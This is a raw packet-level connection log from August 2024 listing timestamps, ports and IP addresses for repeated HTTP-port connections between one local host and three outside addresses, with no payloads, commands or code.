Aug 27, 2024 14:20:39.740019083 CEST	52364	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:39.744796038 CEST	80	52364	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:39.748456001 CEST	52360	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:39.748598099 CEST	52365	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:39.748627901 CEST	52364	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:39.751449108 CEST	52366	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:39.756321907 CEST	80	52366	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:39.756429911 CEST	52366	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:39.756552935 CEST	52366	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:39.761303902 CEST	80	52366	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:39.858340025 CEST	52367	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:39.858342886 CEST	52368	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:39.863214016 CEST	80	52367	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:39.863224983 CEST	80	52368	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:39.863307953 CEST	52367	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:39.863312960 CEST	52368	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:39.863401890 CEST	52368	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:39.863470078 CEST	52367	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:39.868129969 CEST	80	52368	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:39.868263960 CEST	80	52367	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:40.592575073 CEST	80	52368	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:40.592772007 CEST	52368	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:40.595243931 CEST	52368	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:40.600064993 CEST	80	52368	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:40.891527891 CEST	80	52368	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:40.891720057 CEST	52368	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:40.999209881 CEST	52368	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:40.999501944 CEST	52369	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:41.004314899 CEST	80	52369	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:41.004429102 CEST	52369	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:41.004499912 CEST	80	52368	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:41.004512072 CEST	52369	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:41.004554987 CEST	52368	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:41.009263992 CEST	80	52369	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:41.450340033 CEST	80	52367	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:41.450511932 CEST	52367	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:41.478038073 CEST	52367	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:41.482817888 CEST	80	52367	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:41.485533953 CEST	52370	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:41.490371943 CEST	80	52370	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:41.490428925 CEST	52370	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:41.501928091 CEST	52370	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:41.506706953 CEST	80	52370	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:41.701654911 CEST	80	52369	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:41.701733112 CEST	52369	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:41.709636927 CEST	52369	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:41.714473963 CEST	80	52369	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:41.988111973 CEST	80	52369	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:41.988162994 CEST	52369	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:42.100919008 CEST	52369	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:42.101169109 CEST	52371	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:42.106008053 CEST	80	52371	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:42.106076956 CEST	52371	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:42.106293917 CEST	80	52369	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:42.106317997 CEST	52371	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:42.106348991 CEST	52369	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:42.111052990 CEST	80	52371	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:42.803925037 CEST	80	52371	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:42.807432890 CEST	52371	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:42.809700012 CEST	52371	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:42.810005903 CEST	52372	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:42.814898968 CEST	80	52371	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:42.815129042 CEST	80	52372	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:42.815201998 CEST	52371	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:42.815239906 CEST	52372	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:42.815397024 CEST	52372	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:42.820137024 CEST	80	52372	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:43.099932909 CEST	80	52370	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:43.100007057 CEST	52370	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:43.100070000 CEST	52370	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:43.104841948 CEST	80	52370	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:43.204566002 CEST	52373	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:43.209425926 CEST	80	52373	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:43.209486961 CEST	52373	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:43.209594965 CEST	52373	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:43.214329958 CEST	80	52373	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:43.515316963 CEST	80	52372	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:43.515413046 CEST	52372	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:43.626189947 CEST	52372	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:43.626606941 CEST	52374	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:43.635080099 CEST	80	52372	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:43.635094881 CEST	80	52374	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:43.635168076 CEST	52372	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:43.635198116 CEST	52374	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:43.635351896 CEST	52374	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:43.643853903 CEST	80	52374	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:43.768539906 CEST	52373	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:43.768567085 CEST	52366	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:43.768595934 CEST	52374	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:43.773381948 CEST	52375	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:43.773755074 CEST	52376	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:43.778253078 CEST	80	52375	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:43.778351068 CEST	52375	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:43.778887033 CEST	80	52376	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:43.778980017 CEST	52376	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:43.779161930 CEST	52375	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:43.781723022 CEST	52376	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:43.784049034 CEST	80	52375	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:43.786556005 CEST	80	52376	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:43.879163027 CEST	52377	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:43.884073973 CEST	80	52377	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:43.884154081 CEST	52377	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:43.884377003 CEST	52377	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:43.889102936 CEST	80	52377	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:44.495270967 CEST	80	52376	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:44.496536016 CEST	52376	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:44.640790939 CEST	52376	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:44.641180038 CEST	52378	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:44.645967960 CEST	80	52376	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:44.645998001 CEST	80	52378	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:44.646013975 CEST	52376	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:44.646063089 CEST	52378	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:44.646195889 CEST	52378	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:44.650934935 CEST	80	52378	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:45.333827972 CEST	80	52378	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:45.333923101 CEST	52378	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:45.337250948 CEST	52378	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:45.337645054 CEST	52379	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:45.342274904 CEST	80	52378	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:45.342327118 CEST	52378	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:45.342392921 CEST	80	52379	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:45.342470884 CEST	52379	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:45.342609882 CEST	52379	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:45.347366095 CEST	80	52379	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:45.392554045 CEST	80	52375	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:45.392615080 CEST	52375	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:45.392647982 CEST	52375	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:45.397427082 CEST	80	52375	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:45.505366087 CEST	52380	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:45.510303020 CEST	80	52380	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:45.511480093 CEST	52380	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:45.514172077 CEST	52380	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:45.518997908 CEST	80	52380	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:46.031693935 CEST	80	52379	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:46.031909943 CEST	52379	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:46.141171932 CEST	52379	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:46.141171932 CEST	52381	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:46.146070004 CEST	80	52381	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:46.146480083 CEST	80	52379	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:46.146589041 CEST	52379	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:46.146718025 CEST	52381	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:46.146785975 CEST	52381	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:46.151541948 CEST	80	52381	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:46.823645115 CEST	80	52381	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:46.827431917 CEST	52381	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:46.865127087 CEST	52381	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:46.869941950 CEST	80	52381	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:47.100630999 CEST	80	52381	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:47.100702047 CEST	52381	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:47.107304096 CEST	80	52380	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:47.107372046 CEST	52380	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:47.129142046 CEST	52380	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:47.133987904 CEST	80	52380	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:47.163866043 CEST	52382	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:47.170567989 CEST	80	52382	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:47.170630932 CEST	52382	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:47.178275108 CEST	52382	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:47.183202982 CEST	80	52382	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:47.249828100 CEST	52381	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:47.250150919 CEST	52383	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:47.255024910 CEST	80	52381	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:47.255038977 CEST	80	52383	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:47.255079031 CEST	52381	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:47.255117893 CEST	52383	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:47.256108046 CEST	52383	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:47.260899067 CEST	80	52383	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:47.779511929 CEST	52383	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:47.779581070 CEST	52382	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:47.779599905 CEST	52377	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:47.782690048 CEST	52384	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:47.782694101 CEST	52385	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:47.787725925 CEST	80	52384	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:47.787750006 CEST	80	52385	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:47.787841082 CEST	52384	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:47.787842035 CEST	52385	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:47.788064957 CEST	52384	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:47.788120031 CEST	52385	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:47.792910099 CEST	80	52384	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:47.793783903 CEST	80	52385	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:47.893373966 CEST	52386	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:47.898660898 CEST	80	52386	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:47.898734093 CEST	52386	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:47.898953915 CEST	52386	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:47.904759884 CEST	80	52386	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:49.092088938 CEST	80	52385	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:49.092165947 CEST	52385	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:49.092380047 CEST	80	52385	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:49.092426062 CEST	52385	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:49.094371080 CEST	80	52385	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:49.094415903 CEST	52385	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:49.203403950 CEST	52385	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:49.203722954 CEST	52387	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:49.208564997 CEST	80	52387	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:49.208575964 CEST	80	52385	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:49.208652973 CEST	52385	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:49.208658934 CEST	52387	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:49.208806038 CEST	52387	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:49.217425108 CEST	80	52387	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:49.520528078 CEST	80	52386	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:49.521555901 CEST	52386	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:49.521555901 CEST	52386	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:49.525372028 CEST	52388	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:49.526418924 CEST	80	52386	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:49.530118942 CEST	80	52388	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:49.530416965 CEST	52388	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:49.533375025 CEST	52388	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:49.538234949 CEST	80	52388	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:49.902749062 CEST	80	52387	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:49.903047085 CEST	52387	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:49.907031059 CEST	52389	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:49.907031059 CEST	52387	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:49.911844015 CEST	80	52389	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:49.913459063 CEST	52389	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:49.916527987 CEST	80	52387	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:49.921371937 CEST	52387	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:49.927318096 CEST	52389	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:49.932094097 CEST	80	52389	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:50.619313002 CEST	80	52389	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:50.619371891 CEST	52389	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:50.735172987 CEST	52389	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:50.735583067 CEST	52390	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:50.740386963 CEST	80	52389	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:50.740441084 CEST	52389	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:50.740600109 CEST	80	52390	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:50.740665913 CEST	52390	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:50.740789890 CEST	52390	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:50.746716976 CEST	80	52390	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:51.143896103 CEST	80	52388	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:51.144006014 CEST	52388	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:51.144063950 CEST	52388	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:51.149313927 CEST	80	52388	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:51.250437021 CEST	52391	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:51.627250910 CEST	80	52391	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:51.627286911 CEST	80	52390	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:51.627351046 CEST	52391	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:51.627388000 CEST	52390	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:51.627600908 CEST	52391	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:51.629722118 CEST	52390	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:51.630065918 CEST	52392	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:51.633157015 CEST	80	52391	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:51.634768963 CEST	80	52390	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:51.634855032 CEST	52390	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:51.635005951 CEST	80	52392	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:51.635560036 CEST	52392	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:51.635662079 CEST	52392	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:51.640400887 CEST	80	52392	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:51.795020103 CEST	52384	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:51.795022011 CEST	52392	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:51.795109987 CEST	52391	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:51.797379971 CEST	52393	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:51.802309036 CEST	80	52393	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:51.802505970 CEST	52393	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:51.802711010 CEST	52393	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:51.807440996 CEST	80	52393	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:51.907082081 CEST	52394	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:51.907084942 CEST	52395	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:51.912214994 CEST	80	52395	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:51.912226915 CEST	80	52394	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:51.912300110 CEST	52394	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:51.912305117 CEST	52395	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:51.912424088 CEST	52395	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:51.912509918 CEST	52394	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:51.917387962 CEST	80	52395	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:51.917845011 CEST	80	52394	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:52.605211020 CEST	80	52395	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:52.605303049 CEST	52395	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:52.835355997 CEST	52395	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:52.835778952 CEST	52396	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:52.841423035 CEST	80	52395	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:52.841476917 CEST	52395	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:52.841718912 CEST	80	52396	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:52.841788054 CEST	52396	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:52.842010021 CEST	52396	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:52.847748995 CEST	80	52396	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:53.389543056 CEST	80	52393	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:53.389610052 CEST	52393	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:53.389740944 CEST	52393	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:53.394488096 CEST	80	52393	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:53.501375914 CEST	52397	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:53.506298065 CEST	80	52397	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:53.506460905 CEST	52397	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:53.506608963 CEST	52397	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:53.511403084 CEST	80	52397	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:53.521157980 CEST	80	52396	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:53.521241903 CEST	52396	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:53.626713991 CEST	52396	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:53.626718998 CEST	52398	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:53.631515980 CEST	80	52398	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:53.631632090 CEST	52398	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:53.631864071 CEST	52398	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:53.632060051 CEST	80	52396	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:53.632164001 CEST	52396	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:53.636667967 CEST	80	52398	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:54.326442003 CEST	80	52398	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:54.326508999 CEST	52398	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:54.328943968 CEST	52398	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:54.333380938 CEST	52399	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:54.334954023 CEST	80	52398	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:54.335035086 CEST	52398	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:54.338999033 CEST	80	52399	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:54.339087009 CEST	52399	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:54.339381933 CEST	52399	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:54.344233990 CEST	80	52399	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:55.152282000 CEST	80	52399	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:55.152328014 CEST	80	52397	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:55.152375937 CEST	52399	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:55.152409077 CEST	52397	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:55.152606010 CEST	52397	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:55.156404972 CEST	52400	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:55.157360077 CEST	80	52397	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:55.161201000 CEST	80	52400	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:55.161268950 CEST	52400	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:55.161413908 CEST	52400	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:55.166188002 CEST	80	52400	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:55.266180038 CEST	52399	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:55.266489983 CEST	52401	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:55.271322012 CEST	80	52401	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:55.271393061 CEST	52401	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:55.271492958 CEST	52401	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:55.271549940 CEST	80	52399	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:55.271594048 CEST	52399	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:55.276254892 CEST	80	52401	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:55.810708046 CEST	52401	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:55.810712099 CEST	52394	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:55.810852051 CEST	52400	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:55.813869953 CEST	52402	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:55.813908100 CEST	52403	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:55.818849087 CEST	80	52402	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:55.818862915 CEST	80	52403	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:55.818948030 CEST	52403	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:55.818948030 CEST	52402	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:55.819103003 CEST	52403	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:55.819175005 CEST	52402	80	192.168.2.6	89.23.103.42
